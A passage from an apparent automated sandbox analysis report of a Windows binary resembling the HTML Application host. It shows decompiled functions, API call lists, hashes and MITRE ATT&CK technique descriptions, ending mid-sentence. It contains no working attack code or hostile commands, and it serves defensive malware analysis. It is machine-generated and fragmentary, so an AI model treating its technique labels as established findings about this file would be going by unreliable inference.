									 *0xb340cc(_a4, _a8, _a12, _a16); // executed
									_v36();
									if(_t158 != _t158) {
										asm("int 0x29");
									}
									_t152 = _v28;
								}
								FreeLibrary(_t152);
								goto L48;
							} else {
								_t90 = GetProcAddress(_t85, "RegisterApplicationRestart");
								_v16 = _t90;
								if(_t90 == 0) {
									goto L42;
								}
								_t125 = _a12;
								_t145 = _t125 + 1;
								do {
									_t91 =  *_t125;
									_t125 = _t125 + 1;
									_t190 = _t91;
								} while (_t91 != 0);
								_t146 = 2;
								_v36 = _t125 - _t145 + 1;
								_t94 = E00B317D0( ~(0 | _t190 > 0x00000000) | (_t125 - _t145 + 0x00000001) * _t146);
								_v24 = _t94;
								if(_t94 != 0) {
									if(MultiByteToWideChar(0, 0, _a12, 0xffffffff, _t94, _v36) > 0) {
										 *0xb340cc(_v24, 0); // executed
										_v16();
										if(_t158 != _t158) {
											asm("int 0x29");
										}
										_t152 = _v28;
									}
									_push(_v24);
									L00B317F9();
								}
								goto L42;
							}
						}
						if(ExpandEnvironmentStringsA(_t148, _t116, 0x105) == 0) {
							goto L48;
						}
						_t83 = _t116;
						if(_v20 == 0) {
							goto L30;
						}
						goto L29;
					}
				} else {
					_t110 =  &_v16;
					_v16 = 0;
					__imp__rand_s(_t110);
					if(_t110 != 0) {
						goto L9;
					}
					_t157 = 0;
					_t112 = (_v16 & 0x000000ff) + 1;
					_v16 = _t112;
					if(_t112 == 0) {
						goto L9;
					} else {
						goto L8;
					}
					do {
						L8:
						VirtualAlloc(0, 0x10000, 0x2000, 1);
						_t157 = _t157 + 1;
					} while (_t157 < _v16);
					goto L9;
				}
			}

0x00b31468
0x00b3147e
0x00b31486
0x00b3148f
0x00b3148f
0x00b31495
0x00b3149c
0x00b314a3
0x00b314f0
0x00b314f0
0x00b314f8
0x00b31503
0x00b3150b
0x00b31519
0x00b3151d
0x00b31528
0x00b3152e
0x00b31532
0x00b31539
0x00b31539
0x00b31532
0x00b3151d
0x00b3150b
0x00b3153b
0x00b31545
0x00b3154e
0x00b31550
0x00b31555
0x00b31559
0x00b3155f
0x00b31770
0x00b31772
0x00b31774
0x00b31775
0x00b3177a
0x00b3177b
0x00b3177f
0x00b31784
0x00b31784
0x00b31792
0x00b31792
0x00b31567
0x00b31765
0x00b31767
0x00b31769
0x00b3176a
0x00b3176f
0x00000000
0x00b31767
0x00b31572
0x00b31578
0x00b3157d
0x00000000
0x00000000
0x00b31589
0x00b3158f
0x00b31594
0x00b3159b
0x00b3159e
0x00b315a4
0x00b315a7
0x00b315b4
0x00b315ba
0x00b315bf
0x00b315c6
0x00b315c6
0x00b315ca
0x00b315de
0x00b315de
0x00b315ca
0x00b315e4
0x00b315ee
0x00000000
0x00b315f4
0x00b31607
0x00b3160f
0x00000000
0x00000000
0x00b31623
0x00b3162b
0x00000000
0x00000000
0x00b31631
0x00b31637
0x00b31655
0x00b31655
0x00b31657
0x00b31658
0x00b3165e
0x00b31660
0x00b31661
0x00b31664
0x00b31669
0x00b3166a
0x00b31670
0x00b31672
0x00b31679
0x00b3167e
0x00b31684
0x00b31684
0x00b3168d
0x00b31695
0x00b31720
0x00b31722
0x00000000
0x00000000
0x00b3172a
0x00b31730
0x00b31735
0x00b31747
0x00b3174d
0x00b31752
0x00b31759
0x00b31759
0x00b3175b
0x00b3175b
0x00b3175f
0x00000000
0x00b3169b
0x00b316a1
0x00b316a7
0x00b316ac
0x00000000
0x00000000
0x00b316ae
0x00b316b1
0x00b316b4
0x00b316b4
0x00b316b6
0x00b316b7
0x00b316b7
0x00b316bf
0x00b316c5
0x00b316d2
0x00b316d7
0x00b316dd
0x00b316f4
0x00b31700
0x00b31706
0x00b3170b
0x00b31712
0x00b31712
0x00b31714
0x00b31714
0x00b31717
0x00b3171a
0x00b3171f
0x00000000
0x00b316dd
0x00b31695
0x00b31648
0x00000000
0x00000000
0x00b3164e
0x00b31653
0x00000000
0x00000000
0x00000000
0x00b31653
0x00b314b7
0x00b314b7
0x00b314ba
0x00b314be
0x00b314c7
0x00000000
0x00000000
0x00b314cd
0x00b314cf
0x00b314d2
0x00b314d5
0x00000000
0x00000000
0x00000000
0x00000000
0x00b314d7
0x00b314d7
0x00b314e4
0x00b314ea
0x00b314eb
0x00000000
0x00b314d7

APIs

#650.IERTUTIL(00000000,00000001,?,00000004,00000000,00000000,?,00000002,00000000), ref: 00B3147E
SetProcessDEPPolicy.KERNEL32 ref: 00B3148F
rand_s.MSVCRT ref: 00B314BE
VirtualAlloc.KERNEL32(00000000,00010000,00002000,00000001), ref: 00B314E4
GetVersion.KERNEL32(?,00010000,00002000,00000001), ref: 00B314F0
GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 00B31503
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00B31513
LoadLibraryW.KERNEL32(WLDP.DLL), ref: 00B31572
GetProcAddress.KERNEL32(00000000,WldpGetLockdownPolicy), ref: 00B31589
FreeLibrary.KERNEL32(?), ref: 00B315E4
RegOpenKeyExA.KERNEL32(80000000,clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32,00000000,00000001,000000FF), ref: 00B31607
RegQueryValueExA.KERNEL32(000000FF,00000000,00000000,?,00000000,?), ref: 00B31623
ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000105), ref: 00B31640
LoadLibraryA.KERNEL32(00000000), ref: 00B31658
RegCloseKey.KERNEL32(000000FF), ref: 00B3167E
GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B3168D
GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 00B316A1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00B316EC
RegisterApplicationRestart.KERNEL32 ref: 00B31706
GetProcAddress.KERNEL32(00000000,RunHTMLApplication), ref: 00B3172A
FreeLibrary.KERNEL32(00000000), ref: 00B3175F
RegCloseKey.ADVAPI32(000000FF), ref: 00B31784

Strings

kernel32.dll, xrefs: 00B31688
HeapSetInformation, xrefs: 00B3150D
RunHTMLApplication, xrefs: 00B31724
WldpGetLockdownPolicy, xrefs: 00B31583
clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32, xrefs: 00B315FD
Kernel32.dll, xrefs: 00B314FE
RegisterApplicationRestart, xrefs: 00B3169B
WLDP.DLL, xrefs: 00B3156D

Memory Dump Source

Source File: 00000001.00000002.224681367.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000001.00000002.224673548.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224693826.0000000000B34000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b30000_ms.jbxd

Similarity

API ID: AddressLibraryProc$CloseFreeHandleLoadModule$#650AllocApplicationByteCharEnvironmentExpandMultiOpenPolicyProcessQueryRegisterRestartStringsValueVersionVirtualWiderand_s
String ID: HeapSetInformation$Kernel32.dll$RegisterApplicationRestart$RunHTMLApplication$WLDP.DLL$WldpGetLockdownPolicy$clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32$kernel32.dll
API String ID: 3737958553-3560873152
Opcode ID: 566ae037fd1b460796ee18148ba7cda2062421e3ac066bf994b8229d98e008ad
Instruction ID: 6360a9a34ff27ebfe82bac6f51adb8aab9b278658606a481a029aa67b217ad5c
Opcode Fuzzy Hash: 566ae037fd1b460796ee18148ba7cda2062421e3ac066bf994b8229d98e008ad
Instruction Fuzzy Hash: CB91A875A00205EBDF145FA8EC89BAE7BFDEB04750F3449A9FA11A7290DF349D418B60

Uniqueness

Uniqueness Score: -1.00%

Function 00B31910, Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t38;
				intOrPtr _t42;
				signed char _t43;
				signed int _t55;
				intOrPtr _t57;
				signed int _t59;
				void* _t62;

				E00B31DC3();
				_push(0x5c);
				_push(0xb320b0);
				E00B31E7C(__ebx, __edi, __esi);
				 *(_t62 - 0x24) = 0;
				GetStartupInfoW(_t62 - 0x6c);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t57 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t55 = 0;
				while(1) {
					_t42 = _t57;
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t57) {
						Sleep(0x3e8);
						continue;
					} else {
						_t59 = 1;
						_t55 = 1;
					}
					L7:
					if( *0xb33410 != _t59) {
						__eflags =  *0xb33410;
						if(__eflags != 0) {
							 *0xb33014 = _t59;
							goto L13;
						} else {
							 *0xb33410 = _t59;
							_t38 = E00B31AEF(_t42, 0xb310bc, 0xb310c8); // executed
							__eflags = _t38;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							}
						}
					} else {
						_push(0x1f);
						L00B31C74();
						L13:
						if( *0xb33410 == _t59) {
							_push(0xb310b8);
							_push(0xb310b0);
							L00B31E76();
							 *0xb33410 = 2;
						}
						if(_t55 == 0) {
							 *0xb3340c = 0;
						}
						_t71 =  *0xb33414;
						if( *0xb33414 != 0 && E00B31CD0(_t71, 0xb33414) != 0) {
							 *0xb340cc(0, 2, 0);
							 *((intOrPtr*)( *0xb33414))();
						}
						_t59 =  *_acmdln;
						 *(_t62 - 0x20) = _t59;
						_t55 =  *(_t62 - 0x24);
						while(1) {
							_t43 =  *_t59;
							if(_t43 > 0x20) {
								goto L32;
							}
							if(_t43 != 0) {
								if(_t55 != 0) {
									goto L32;
								} else {
									while(_t43 != 0 && _t43 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x20) = _t59;
										_t43 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x40) & 0x00000001;
							if(( *(_t62 - 0x40) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x3c) & 0x0000ffff;
							}
							_t30 = E00B31460(0xb30000, 0, _t59, _t29); // executed
							 *0xb33010 = _t30;
							__eflags =  *0xb33028;
							if( *0xb33028 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0xb33014;
							if( *0xb33014 == 0) {
								__imp___cexit();
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t43 - 0x22;
							if(_t43 == 0x22) {
								__eflags = _t55;
								_t15 = _t55 == 0;
								__eflags = _t15;
								_t55 = 0 | _t15;
								 *(_t62 - 0x24) = _t55;
							}
							_t26 = _t43 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x20) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x20) = _t59;
						}
					}
					L40:
					return E00B31EC4(0, _t55, _t59);
				}
				_t59 = 1;
				__eflags = 1;
				goto L7;
			}

0x00b31910
0x00b3191a
0x00b3191c
0x00b31921
0x00b31928
0x00b3192f
0x00b31935
0x00b3193e
0x00b31941
0x00b31943
0x00b31948
0x00b3194c
0x00b31952
0x00000000
0x00000000
0x00b31956
0x00b31964
0x00000000
0x00b31958
0x00b3195a
0x00b3195b
0x00b3195b
0x00b3196f
0x00b31975
0x00b31981
0x00b31987
0x00b319b5
0x00000000
0x00b31989
0x00b31989
0x00b31999
0x00b319a0
0x00b319a2
0x00000000
0x00b319a4
0x00b319a4
0x00b319ab
0x00b319a2
0x00b31977
0x00b31977
0x00b31979
0x00b319bb
0x00b319c1
0x00b319c3
0x00b319c8
0x00b319cd
0x00b319d4
0x00b319d4
0x00b319e0
0x00b319e9
0x00b319e9
0x00b319eb
0x00b319f2
0x00b31a0f
0x00b31a15
0x00b31a15
0x00b31a1c
0x00b31a1e
0x00b31a21
0x00b31a24
0x00b31a24
0x00b31a29
0x00000000
0x00000000
0x00b31a2d
0x00b31a31
0x00000000
0x00000000
0x00b31a33
0x00b31a3c
0x00b31a3d
0x00b31a40
0x00b31a40
0x00b31a33
0x00b31a31
0x00b31a44
0x00b31a48
0x00b31a52
0x00b31a4a
0x00b31a4a
0x00b31a4a
0x00b31a5b
0x00b31a60
0x00b31a65
0x00b31a6c
0x00b31a6f
0x00000000
0x00b31a6f
0x00b31ace
0x00b31ad5
0x00b31ad7
0x00b31add
0x00b31ae2
0x00000000
0x00b31a75
0x00b31a75
0x00b31a78
0x00b31a7c
0x00b31a7e
0x00b31a7e
0x00b31a81
0x00b31a83
0x00b31a83
0x00b31a86
0x00b31a8a
0x00b31a91
0x00b31a93
0x00b31a95
0x00b31a95
0x00b31a96
0x00b31a96
0x00b31a99
0x00b31a9a
0x00b31a9a
0x00b31a24
0x00b31ae9
0x00b31aee
0x00b31aee
0x00b3196e
0x00b3196e
0x00000000

APIs

Part of subcall function 00B31DC3: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00B31DF0
Part of subcall function 00B31DC3: GetCurrentProcessId.KERNEL32 ref: 00B31DFF
Part of subcall function 00B31DC3: GetCurrentThreadId.KERNEL32 ref: 00B31E08
Part of subcall function 00B31DC3: GetTickCount.KERNEL32 ref: 00B31E11
Part of subcall function 00B31DC3: QueryPerformanceCounter.KERNEL32(?), ref: 00B31E26

GetStartupInfoW.KERNEL32(?,00B320B0,0000005C), ref: 00B3192F
Sleep.KERNEL32(000003E8), ref: 00B31964
_amsg_exit.MSVCRT ref: 00B31979
_initterm.MSVCRT ref: 00B319CD
__IsNonwritableInCurrentImage.LIBCMT ref: 00B319F9
exit.KERNELBASE ref: 00B31A6F
_ismbblead.MSVCRT ref: 00B31A8A

Memory Dump Source

Source File: 00000001.00000002.224681367.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000001.00000002.224673548.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224693826.0000000000B34000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b30000_ms.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 3c177e5907a6277f8ba72b1f2a5fae1ccb80fc1381006866f66d0996f5b46496
Instruction ID: b63a7353c4b68e2399c2e5e8d4e22aa484b28290933524888d3f93923be2bd82
Opcode Fuzzy Hash: 3c177e5907a6277f8ba72b1f2a5fae1ccb80fc1381006866f66d0996f5b46496
Instruction Fuzzy Hash: 8A411635A45724DFDB258B5CD95536E77FCEB04B22F3049AAE851A73A0CF708E4187A0

Uniqueness

Uniqueness Score: -1.00%

Function 06B90830, Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000003.222316903.0000000006B90000.00000010.00000001.sdmp, Offset: 06B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_6b90000_ms.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be2cfd8b987d6f027ea48c35dc590bac23dd0f26fb8dc0e48c0de3deecf971ab
Instruction ID: 18f70418b687cd8409365cced87e5f06e77d5e5e07c9b1a5460b42db1196bb40
Opcode Fuzzy Hash: be2cfd8b987d6f027ea48c35dc590bac23dd0f26fb8dc0e48c0de3deecf971ab
Instruction Fuzzy Hash: CAB1E3B8E047458FEF84EF98D880A6EF7F6FF88308F1085A9D95667241D7705891CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06590FDF, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000003.222338089.0000000006590000.00000010.00000001.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_6590000_ms.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 06590FD7, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000003.222338089.0000000006590000.00000010.00000001.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_6590000_ms.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 06590FCF, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000003.222338089.0000000006590000.00000010.00000001.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_6590000_ms.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 06590FE7, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000003.222338089.0000000006590000.00000010.00000001.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_6590000_ms.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: fa57662f1034b7c7c3783c126cd2847d19b93af6d09d97e26ac96d297c4fef6a
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B31DC3, Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00B31DC3() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xb33004;
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0xb33004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0xb33004 = _t39;
				}
				_t37 =  !_t36;
				 *0xb33008 = _t37;
				return _t37;
			}

0x00b31dcb
0x00b31dcf
0x00b31dd3
0x00b31de6
0x00b31df0
0x00b31dfc
0x00b31e05
0x00b31e0e
0x00b31e1f
0x00b31e26
0x00b31e32
0x00b31e35
0x00b31e39
0x00b31e43
0x00b31e48
0x00b31e48
0x00b31e4a
0x00b31e4a
0x00b31e50
0x00b31e53
0x00b31e5c

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00B31DF0
GetCurrentProcessId.KERNEL32 ref: 00B31DFF
GetCurrentThreadId.KERNEL32 ref: 00B31E08
GetTickCount.KERNEL32 ref: 00B31E11
QueryPerformanceCounter.KERNEL32(?), ref: 00B31E26

Memory Dump Source

Source File: 00000001.00000002.224681367.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000001.00000002.224673548.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224693826.0000000000B34000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b30000_ms.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 27aaace952ce5197f2a6c511c54c0974e0463c19e34ce6a67d0d3e3f07009f59
Instruction ID: 8775afecb0aa19943d5c0ec544985b8c22b3441758380b6a0f50ab46a462aa2a
Opcode Fuzzy Hash: 27aaace952ce5197f2a6c511c54c0974e0463c19e34ce6a67d0d3e3f07009f59
Instruction Fuzzy Hash: D6111C75E01218EBCB14DBB8DA5869EBBF8EF48311F6148A6E905E7210DB309B408B50

Uniqueness

Uniqueness Score: -1.00%

Function 00B31F11, Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00B31F11(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00b31f18
0x00b31f21
0x00b31f3a

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B32047,00B31000), ref: 00B31F18
UnhandledExceptionFilter.KERNEL32(00B32047,?,00B32047,00B31000), ref: 00B31F21
GetCurrentProcess.KERNEL32(C0000409,?,00B32047,00B31000), ref: 00B31F2C
TerminateProcess.KERNEL32(00000000,?,00B32047,00B31000), ref: 00B31F33

Memory Dump Source

Source File: 00000001.00000002.224681367.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000001.00000002.224673548.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224693826.0000000000B34000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b30000_ms.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 5ed3e495111bde6076109760af6f3f3aa33dd8710e8fb656f3e66c90acb8bd05
Instruction ID: 9ee998329ac382e79394d717cda4f02227c1437ca0b600da4c19cc20fe90fdfd
Opcode Fuzzy Hash: 5ed3e495111bde6076109760af6f3f3aa33dd8710e8fb656f3e66c90acb8bd05
Instruction Fuzzy Hash: 71D0CA32604208BBCB092BE2EE0CA5D3F28EB88212F240000F30A830A0CF35A8018B65

Uniqueness

Uniqueness Score: -1.00%

Function 00B31800, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00B31800() {
				signed int _t10;
				void* _t15;
				signed int _t18;
				intOrPtr _t19;
				void* _t25;

				_t25 =  *0xb30000 - 0x5a4d; // 0x5a4d
				if(_t25 == 0) {
					_t19 =  *0xb3003c; // 0xe8
					__eflags =  *((intOrPtr*)(_t19 + 0xb30000)) - 0x4550;
					if( *((intOrPtr*)(_t19 + 0xb30000)) != 0x4550) {
						goto L1;
					} else {
						_t2 = _t19 + 0xb30018; // 0xc0e010b
						_t18 =  *_t2 & 0x0000ffff;
						__eflags = _t18 - 0x10b;
						if(_t18 == 0x10b) {
							_t10 = 0;
							__eflags =  *((intOrPtr*)(_t19 + 0xb30074)) - 0xe;
							if( *((intOrPtr*)(_t19 + 0xb30074)) > 0xe) {
								__eflags =  *(_t19 + 0xb300e8);
								goto L9;
							}
						} else {
							__eflags = _t18 - 0x20b;
							if(_t18 != 0x20b) {
								goto L1;
							} else {
								_t10 = 0;
								__eflags =  *((intOrPtr*)(_t19 + 0xb30084)) - 0xe;
								if( *((intOrPtr*)(_t19 + 0xb30084)) > 0xe) {
									__eflags =  *(_t19 + 0xb300f8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t10 = _t10 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t10 = 0;
				}
				 *0xb33028 = _t10;
				__set_app_type(E00B31C3E(2));
				 *0xb33404 =  *0xb33404 | 0xffffffff;
				 *0xb33408 =  *0xb33408 | 0xffffffff;
				 *(__p__fmode()) =  *0xb3303c;
				 *(__p__commode()) =  *0xb33030;
				_t15 = E00B31E60();
				if( *0xb33000 == 0) {
					__setusermatherr(E00B31E60);
				}
				E00B31E63(_t15);
				return 0;
			}

0x00b31805
0x00b3180c
0x00b31812
0x00b31818
0x00b31822
0x00000000
0x00b31824
0x00b31824
0x00b31824
0x00b3182b
0x00b31830
0x00b3184c
0x00b3184e
0x00b31855
0x00b31857
0x00000000
0x00b31857
0x00b31832
0x00b31832
0x00b31837
0x00000000
0x00b31839
0x00b31839
0x00b3183b
0x00b31842
0x00b31844
0x00b3185d
0x00b3185d
0x00b3185d
0x00b3185d
0x00b3185d
0x00b31842
0x00b31837
0x00b31830
0x00b3180e
0x00b3180e
0x00b3180e
0x00b3180e
0x00b31862
0x00b3186d
0x00b31873
0x00b3187a
0x00b3188f
0x00b3189d
0x00b3189f
0x00b318ab
0x00b318b2
0x00b318b8
0x00b318b9
0x00b318c0

APIs

__set_app_type.MSVCRT ref: 00B3186D
__p__fmode.MSVCRT ref: 00B31883
__p__commode.MSVCRT ref: 00B31891
__setusermatherr.MSVCRT ref: 00B318B2

Strings

.$, xrefs: 00B3184E

Memory Dump Source

Source File: 00000001.00000002.224681367.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000001.00000002.224673548.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224693826.0000000000B34000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b30000_ms.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type__setusermatherr
String ID: .$
API String ID: 1063105408-2223841709
Opcode ID: da0426f94d9aedacaebb3f1ad0b00c42b68b6e1c2d4523bfc8b66735839edf9a
Instruction ID: e4cf75923a952ffb20debefb99acd38af4ad19fb08b507f422c56da8460c4165
Opcode Fuzzy Hash: da0426f94d9aedacaebb3f1ad0b00c42b68b6e1c2d4523bfc8b66735839edf9a
Instruction Fuzzy Hash: 11117330A10308DFD728AB38E99C21936E9EF00766F314DA9D515CB1E1DF3A9581CB18

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
